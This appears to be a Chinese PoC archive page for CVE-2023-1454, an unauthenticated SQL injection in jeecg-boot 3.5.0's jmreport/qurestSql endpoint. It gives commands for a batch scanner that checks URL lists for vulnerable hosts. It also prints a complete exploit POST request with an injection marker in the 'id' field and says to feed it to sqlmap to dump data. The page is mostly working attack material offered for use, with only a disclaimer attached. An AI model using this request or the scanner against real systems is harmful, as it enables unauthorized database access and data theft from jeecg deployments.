POC详情: 869c6684aa3d15bc43ed77f5709815e096a085db

来源
关联漏洞
标题: jeecg SQL注入漏洞 (CVE-2023-1454)
描述:jeecg是一个应用软件。一款基于代码生成器的智能开发平台。 jeecg-boot 3.5.0版本存在SQL注入漏洞,该漏洞源于文件 jmreport/qurestSql 存在安全问题, 通过参数 apiSelectId 导致SQL注入。
描述
jmreport/qurestSql 未授权SQL注入批量扫描poc
介绍
# CVE-2023-1454
jmreport/qurestSql 未授权SQL注入批量扫描poc
Jeecg-Boot是一款基于Spring Boot和Jeecg-Boot-Plus的快速开发平台,最新的jeecg-boot 3.5.0 中被爆出多个SQL注入漏洞。

## 工具利用

python3 CVE-2023-1454-scan.py -u http://127.0.0.1:1111 单个url测试

python3 CVE-2023-1454-scan.py -f url.txt 批量检测

扫描结束后会在当前目录生成存在漏洞url的vuln.txt

poc:

![](./poc.png)

exp:

将数据包保存为txt用sqlmap可得到数据
```
POST /jeecg-boot/jmreport/qurestSql HTTP/1.1
Host: xxx.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2088.112 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/json;charset=UTF-8
Content-Length: 129

{"apiSelectId":"1290104038414721025",
"id":"1*"}
```
![](./exp.png)
## 免责声明

由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。
文件快照

[4.0K] /data/pocs/869c6684aa3d15bc43ed77f5709815e096a085db ├── [2.7K] CVE-2023-1454-scan.py ├── [ 69K] exp.png ├── [ 94K] poc.png └── [1.1K] README.md 0 directories, 4 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。